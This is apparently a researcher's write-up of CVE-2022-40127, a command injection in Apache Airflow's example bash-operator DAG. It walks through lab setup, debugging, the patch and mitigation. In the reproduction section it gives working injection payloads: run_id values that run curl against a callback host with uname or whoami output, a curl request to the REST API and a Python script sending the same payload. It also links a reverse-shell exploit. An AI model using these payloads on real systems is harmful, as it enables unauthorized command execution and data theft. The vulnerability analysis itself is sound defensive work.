RCE via example DAG in Apache Airflow (CVE-2022–40127)

vsociety
Aug 21, 2023

Summary

In this writeup, we delve into the analysis of a command injection vulnerability (CVE-2022–40127) leading to remote command execution (RCE) in Apache Airflow.

Description

Introduction

In this writeup, we delve into the analysis of a command injection vulnerability in Apache Airflow, known as CVE-2022–40127, that leads to remote command execution (RCE). (If you are not a security expert: command injection vulnerabilities occur when an attacker manipulates the system to execute unintended commands by injecting malicious code or unauthorized inputs into the application.)

The official description says no more than:

“A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter.”

We will cover everything needed to understand the security issue and then perform the attack both from the UI and from the Airflow REST API.

This issue affects Apache Airflow versions prior to 2.4.0 (released on Sep 19, 2022).

About Airflow

Apache Airflow is a popular open-source platform for orchestrating complex data workflows that has emerged as a crucial tool in the data engineering and data science domains over the past few years.

You may ask how popular this software is, so here are some numbers:

  • Over 8 million downloads and 20000 contributors. Over 300 companies, including Airbnb, Slack, Walmart, etc., use Airflow to run their data pipelines efficiently.[1]
  • Used and popular in bigger companies: 64% of Airflow users work for companies with 200+ employees which is an 11 percent increase compared to 2020.[2]
  • At the time of writing this article, there were more than 11 million downloads in the last month on PyPI alone![3]

Lab setup

I was working on Kali Linux but you can use any other Unix-based distribution.

Install PyCharm

Since Airflow itself has limited debugging capabilities, we install the latest version of PyCharm from the official download page[4].

Let’s put it under /opt for now. No installation is needed; it can be run as a standalone application.

Install Python3.8

We install Python 3.8, one of the Python versions supported by Airflow 2.3.4. I followed this tutorial:

https://linuxize.com/post/how-to-install-python-3-8-on-debian-10/

Then I upgraded pip (because why not):

pip3.8 install --upgrade pip

Then create and activate a virtual environment in a working directory:

cd /opt
mkdir airflow && cd airflow
python3.8 -m venv airflow-2.3.4
cd airflow-2.3.4
chmod +x ./bin/activate
source bin/activate

Install Airflow

Let’s install Apache Airflow’s vulnerable version (2.3.4) together with its providers. Based on the notes on the official page[5], we should install it with the correct provider versions via a constraints file.

Since we want to use Python 3.8, our magic install command will be the following:

pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.8.txt"

Verify that the installation was successful:

which airflow

The output should be:

/opt/airflow/airflow-2.3.4/bin/airflow

Also, verify that the correct version is installed with airflow info:

Alternative installation

If you don’t want to debug the app, you can go with a Docker Compose file instead:

cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
# Download the docker-compose file
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
# Run Airflow
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up -d
xdg-open http://localhost:8080

Configure project settings in Pycharm

Go into the folder of the installed airflow package:

cd lib/python3.8/site-packages/airflow

Run PyCharm from this directory with /opt/pycharm-2023.1.4/bin/pycharm.sh.

Click on “Trust project” if asked.

Our next task is to configure some project settings and the run/debug properties. Start by setting the proper interpreter: click on the Python interpreter label in the bottom-right corner of PyCharm, then select Add Local Interpreter.

Set the Location and the Base interpreter to venv’s Python 3.8:

The Python interpreter should be at /opt/airflow/airflow-2.3.4/bin/python3.8.

Then, modify the run/debug configurations.

The script path should point to the main method:

/opt/airflow/airflow-2.3.4/lib/python3.8/site-packages/airflow/__main__.py

Pass standalone as a parameter since, at first, we want to run the whole app rather than a single component. Then, click on Apply.

Make sure you have the same config as below in the Settings (File / Settings / Build, Execution, Deployment / Python Debugger):

Now we have everything to run the Airflow standalone from PyCharm, so click on the Run icon!

If everything is fine, then you should see that the webserver and all the components are running in the console.

Then, open http://localhost:8080 in a browser. You should see the login page:

The login credentials are in the logs. Log in with them.

Reproducing the vulnerability

1. Via the UI

So let’s try to exploit the vulnerability via the webserver’s built-in UI. As a commonly used approach, we will inject an OS command that performs a DNS lookup to a server we control. There are free services for this (e.g. http://dnslog.cn/), but we’ll use our favorite: Burp Suite Professional’s Collaborator.

Let’s open the example_bash_operator default example DAG.

We can give a run ID by triggering a DAG with a custom config, so let’s click on the blueish “▶” button and select Trigger DAG w/ config!

The Run ID will be something like this:

\";curl uname.collaborator.url.com;\""

Let’s fire up the Collaborator and paste the URL from the clipboard into the payload above!

Click on the “Trigger” labeled button to push the DAG into the queue.

You should see the following message: “Triggered example_bash_operator, it should start any moment now.”

In the Graph menu of a DAG, you can check how the run is progressing. When it reaches the also_run_this task, check the Collaborator:

Ohh, there it is! The uname command was executed and its result was sent to the Collaborator server as a subdomain, just as we expected. Now let’s move on to the API and see how to perform the same RCE with it.

2. Via the API

After some research, I found that triggering a new DAG run with a run_id is also possible[6] via the REST API that ships with Airflow.

Additionally, you can browse the same API reference on the running instance locally via both Swagger UI and Redoc:

Based on the resources above we can achieve the same effect as with the UI by running this curl command:

curl -X POST http://127.0.0.1:8080/api/v1/dags/example_bash_operator/dagRuns \
-H 'accept: application/json' \
-H 'Content-Type: application/json' \
-H 'Cookie: session=[REDACTED]' \
-d '{
"conf": {},
"dag_run_id": "run_id\"; curl whoami.collaborator_url.com"
}'

You should get a similar response from curl (and don’t forget to check the collaborator as well):
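If you prefer scripting over curl, here is a minimal Python sketch of the same request using the requests library (the host, session cookie, and Collaborator domain are placeholders you have to adjust; this simply mirrors the curl call above):

import requests

# Placeholders: adjust the host, session cookie and callback domain to your setup.
AIRFLOW_URL = "http://127.0.0.1:8080"
SESSION_COOKIE = "[REDACTED]"
PAYLOAD_RUN_ID = 'run_id"; curl whoami.collaborator_url.com'

# POST /api/v1/dags/{dag_id}/dagRuns creates a new DAG run; the malicious
# dag_run_id is later rendered into the example DAG's bash_command template.
response = requests.post(
    f"{AIRFLOW_URL}/api/v1/dags/example_bash_operator/dagRuns",
    json={"conf": {}, "dag_run_id": PAYLOAD_RUN_ID},
    headers={"accept": "application/json"},
    cookies={"session": SESSION_COOKIE},
)
print(response.status_code, response.text)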

3. Using a custom exploit

Since I couldn’t find any public exploit for this CVE, I wrote my own, which also gives us a reverse shell. I’ll write about the exploit in a separate article.

https://github.com/jakabakos/CVE-2022-40127-Airflow-RCE

Static analysis

The basic architecture of Airflow

Apache Airflow follows a distributed architecture that enables the orchestration and scheduling of complex data workflows. At its core, Airflow consists of several key components that work together to facilitate the efficient execution of tasks and manage dependencies. Let’s go over the most important terms needed to understand Airflow’s architecture and what these components are.

  1. Scheduler: The scheduler component is responsible for determining when and how tasks should be executed. It also submits tasks to the executor to run.
  2. Executor: Handles running tasks.
  3. Workers: Responsible for executing tasks in a distributed manner. They pull tasks from the task queue and execute them on separate worker nodes, allowing for parallel execution and scalability.
  4. Task Dependencies: Airflow allows users to define dependencies between tasks using directed acyclic graphs (DAGs). This is the core concept of Airflow. Tasks can be chained together, allowing for complex workflows with conditional branching and parallelism. Tasks are triggered based on their dependencies and the success or failure of preceding tasks. (A minimal example DAG follows this list.)
  5. Metadata database: Airflow utilizes a metadata database, such as MySQL or PostgreSQL, to store information used by the executor and scheduler about the workflow, tasks, and their dependencies.
  6. Webserver: Airflow provides a web-based user interface, called the Airflow UI or the Airflow Webserver, to inspect, trigger, and debug the behavior of DAGs and tasks.
  7. Operators: Airflow provides a wide range of built-in operators that define the actions performed by tasks, such as executing a shell command, running a SQL query, or transferring files. Executors manage the execution of these operators, ensuring they run as specified and handling their results and states.

(source: https://airflow.apache.org/docs/apache-airflow/stable/core-concepts/overview.html)
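To make these concepts concrete, here is a minimal DAG sketch (my own illustration, not one of Airflow’s bundled examples): two BashOperator tasks whose dependency is declared with the >> operator, which the scheduler resolves and the executor runs.

from datetime import datetime

from airflow import DAG
from airflow.operators.bash import BashOperator

# A DAG groups tasks and their dependencies; the scheduler decides when to run it.
with DAG(
    dag_id="minimal_example",
    start_date=datetime(2023, 1, 1),
    schedule_interval=None,  # only runs when triggered manually
    catchup=False,
) as dag:
    # Operators define what each task does; BashOperator runs a shell command.
    extract = BashOperator(task_id="extract", bash_command="echo extracting")
    load = BashOperator(task_id="load", bash_command="echo loading")

    # The >> operator declares a dependency: "load" runs only after "extract" succeeds.
    extract >> load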

By leveraging this architecture, Apache Airflow enables users to define, schedule, and monitor complex data workflows. Its distributed nature, coupled with the ability to define dependencies and utilize various executors, makes it a powerful tool for orchestrating data pipelines, ETL (Extract, Transform, Load) processes, and other data-driven tasks in a reliable and scalable manner.

Analyzing the vulnerable DAG

Some example DAGs come with a basic Airflow installation. We know that the vulnerability we are looking for is in one of them.

After running through these examples I found example_bash_operator scary enough to check its source.

Let’s check the source code of the DAG by navigating to the “Code” section.

A small reminder from the original CVE description:

“A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter.”

So where is the run_id parameter used in this code? Have you spotted the suspicious snippet on line 61?

bash_command='echo "run_id={{ run_id }} | dag_run={{ dag_run }}"',

If you are not familiar with Python and are wondering what those curly braces mean, let’s see what the official Python documentation[7] says about them:

“Format strings contain “replacement fields” surrounded by curly braces {}. Anything that is not contained in braces is considered literal text, which is copied unchanged to the output. If you need to include a brace character in the literal text, it can be escaped by doubling: {{ and }}.”

These placeholders are typically used in the context of templating engines, such as Jinja, to substitute values dynamically. The actual values for run_id and dag_run would be provided during the execution of the bash command.

If you have the eyes of a hacker, you may already have noticed that this snippet looks exactly like something that could contain a command injection vulnerability. Because of the echo Unix command, we can assume that the string represents a bash command that will be executed when the task is triggered.

The next question is: what will bash_command be if the user-supplied run_id is not properly sanitized? If the value of run_id is, for example, any_run_id"; whoami;", then the bash command will be:

'echo "run_id= any_run_id”;whoami | dag_run={{ dag_run }}"'

Note that the first injected double quote closes the argument of the echo command, a new bash command (whoami) is introduced with the ";" character, and the payload’s trailing quote swallows the rest of the template as a harmless, invalid command.
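To see the substitution concretely, here is a small, self-contained sketch using the jinja2 library directly (Airflow’s task rendering involves more machinery, but the string substitution itself behaves the same way):

from jinja2 import Template

# The templated command from example_bash_operator.py.
template = Template('echo "run_id={{ run_id }} | dag_run={{ dag_run }}"')

benign = template.render(run_id="manual_run_1", dag_run="<DagRun ...>")
injected = template.render(run_id='any_run_id"; whoami;"', dag_run="<DagRun ...>")

print(benign)    # echo "run_id=manual_run_1 | dag_run=<DagRun ...>"
print(injected)  # echo "run_id=any_run_id"; whoami;" | dag_run=<DagRun ...>"
# In the injected line, the first quote closes echo's argument, ";" ends the
# command, and whoami executes before the leftover quoted text fails.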

Some notes on other parts of the code:

- In lines 29–37, there is the DAG declaration.

- In lines 43–46, there is the run_this task definition, and on line 49 it is added as a dependency of the run_this_last task.

- Tasks declare dependencies on each other. On line 64, you can see that the DAG defines the also_run_this task as a dependency of the run_this_last task.

Debugging

The settings needed for debugging are already applied in the “Lab setup” section so please check it if you skipped that part.

To see how the data (run_id) flows, we have to make some modifications due to some unique characteristics of Airflow. Frankly, this is the most painful part of this analysis: when you run a “standalone” version of Airflow from any IDE, breakpoints won’t hit except in the main method. After spending two days trying to figure out why debugging wasn’t working as it should, I finally found a solution that is not perfect but at least works.

As mentioned in the “Static analysis” section, Airflow has three main components that are started as separate processes. If you start these processes separately, the breakpoints will hit, so this is what we will do. These main components are:

  1. scheduler
  2. triggerer
  3. webserver

Figuring out which code belongs to which component is not obvious in all cases. The webserver is built with Flask, and I found that the code handling the /trigger view is in /www/views.py (line 1965).

As a next step, we try to keep track of the run_id. For this, set the run/debug config to run the webserver only (running the scheduler and the triggerer services is not needed at this point).

Trigger the DAG with simply PLACEHOLDER as the Run ID.

As you can see in the next picture, a new DagRun is created in views.py (line 2077) by calling models.dag.create_dagrun() (see dag.py).

On line 2379 of dag.py, a new DagRun object is created and added to the current session, and – as the comment says – the associated task instances are created. After triggering the DAG with our custom run_id parameter, a new run is created.

The next part is associated with the triggerer component so let’s modify the run/debug config by changing webserver to triggerer.

The next target of interest is figuring out what exactly happens when example_bash_operator.py is triggered by the executor, so set a breakpoint on line 61 to see what the value of bash_command will be.

This time we send a “real” attack payload instead of PLACEHOLDER.

However, the run_id placeholder is not substituted at this point, so we have to find another breakpoint to catch the command injection.

Well… working with such a large codebase, sometimes we have to be a bit creative. After the DAG is triggered, you can see the logs by clicking on a task in the Graph submenu of a DAG in the webserver. In the last DAG execution, you can see that the command stored in the also_run_this BashOperator’s bash_command variable is executed with a subprocess. Although the subprocess module is part of the Python standard library, it is invoked from Airflow’s /hooks/subprocess.py. We can figure this out by searching for the log string with PyCharm’s built-in search tool (Find in Files – you can reach it by right-clicking the base folder and selecting this menu).

So let’s see what’s happening there. On line 76, a new process is started with the following command list (based on the logs):

['/usr/bin/bash', '-c', 'echo "run_id=\\";curl whoami.collaborator-url.com;\\"" | dag_run=<DagRun example_bash_operator @ 2023-07-20 13:52:16+00:00: \\";curl whoami.collaborator-url.com;\\"", state:running, queued_at: 2023-07-20 13:52:21.982883+00:00. externally triggered: True>"']

The official documentation says the following about subprocess.Popen (which is called here): “Execute a child program in a new process.”[8] So this is where our beloved command injection takes place.
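As a minimal illustration of why this is game over (a simplified sketch, not Airflow’s actual SubprocessHook code): once the injected text is part of the string handed to bash -c, bash happily runs every command in it.

import subprocess

# The command string rendered from the template with the injected run_id
# (the same string as in the Jinja sketch earlier).
rendered = 'echo "run_id=any_run_id"; whoami;" | dag_run=<DagRun ...>"'

# Roughly what happens in hooks/subprocess.py: the whole rendered string is
# handed to a shell, so the injected whoami runs right after the intended echo.
proc = subprocess.Popen(
    ["/usr/bin/bash", "-c", rendered],
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,
)
print(proc.communicate()[0].decode())
# Output: the echoed text, the current user from whoami, and a harmless
# "command not found" error for the leftover quoted fragment.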

The next issue I faced was that no matter which Airflow component I loaded into PyCharm to debug, the breakpoints I set in this class were never hit. Since we already have everything needed to understand the bug, since it is nearly impossible to figure out how the call chain works under the hood in this case, and since the built-in logging makes it completely clear how the command injection works, I ended the dynamic analysis here.

Patch diffing

The official fix for this vulnerability is quite simple: it only touches the bash operator example DAG (airflow/example_dags/example_bash_operator.py).

Since the user-provided run_id is no longer reflected in the templated command, the command injection vulnerability is resolved.
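The linked diff below is authoritative; as a rough sketch of the idea (my own illustration, not the verbatim upstream patch), the templated command simply stops echoing anything the triggering user can control:

from airflow.operators.bash import BashOperator

# Vulnerable variant: run_id is attacker-controlled when a run is triggered
# manually, and it is rendered straight into a shell command.
also_run_this_vulnerable = BashOperator(
    task_id="also_run_this_vulnerable",
    bash_command='echo "run_id={{ run_id }} | dag_run={{ dag_run }}"',
)

# Safer variant (illustrative): echo only values the triggering user cannot
# influence, such as the templated task-instance key.
also_run_this_fixed = BashOperator(
    task_id="also_run_this_fixed",
    bash_command='echo "ti_key={{ task_instance_key_str }}"',
)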

You can check the diff here:

https://github.com/apache/airflow/pull/25960/files#diff-7c35dc3aa6659f910139c28057dfc663dd886dd0dfb3d8a971603c2ae7790d2a

Mitigation

The mitigation is simple:

  • Update Airflow to version 2.4.0 or later.
  • Do not enable example DAGs on systems whose UI users should not be able to execute arbitrary commands (set load_examples = False in airflow.cfg; see the snippet below for a quick check).
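If you want to check the second point programmatically, here is a small sketch using Airflow’s configuration API (run it inside the Airflow environment; example DAGs are only loaded when load_examples in the [core] section is True):

from airflow.configuration import conf

# Example DAGs (including example_bash_operator) are only loaded when
# [core] load_examples is True (or AIRFLOW__CORE__LOAD_EXAMPLES is set to True).
if conf.getboolean("core", "load_examples"):
    print("Example DAGs are enabled - consider disabling them on hardened installs.")
else:
    print("Example DAGs are disabled.")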

Final thoughts

The process of figuring out how to perform the attack based on the one-sentence description in the official CVE report for a recent Apache Airflow vulnerability has been both challenging and enlightening. One of the notable difficulties encountered during this analysis was the intricacy of debugging the vulnerability and understanding its root cause. (To be honest, I am still not sure whether it is possible to debug the whole app running as a standalone, so if you have a solution, please contact me!)

Command injection and RCE vulnerabilities often involve complex interactions between user inputs, command execution, and potential code injection, making them particularly challenging to trace and mitigate. However, this one was perhaps among the simpler cases. One of the most significant takeaways from this process is that finding severe vulnerabilities does not always rely on chaining complex vulnerabilities together.

On a personal note, delving into this vulnerability has been a tremendous learning experience. I gained valuable insights into the intricacies of command injection vulnerabilities, their potential impact, and the best practices to mitigate such risks effectively. The analysis deepened my understanding of secure coding principles, input validation, and the importance of following secure development practices from the earliest stages of software design.

Another important takeaway was getting familiar with the architecture of Airflow, which opened the doors to further vulnerability analysis and even the possibility of finding my own vulnerabilities in this software.

Resources

Ákos Jakab

Cybersecurity researcher

Join vsociety: https://vsociety.io/

Checkout our discord: https://discord.gg/sHJtMteYHQ
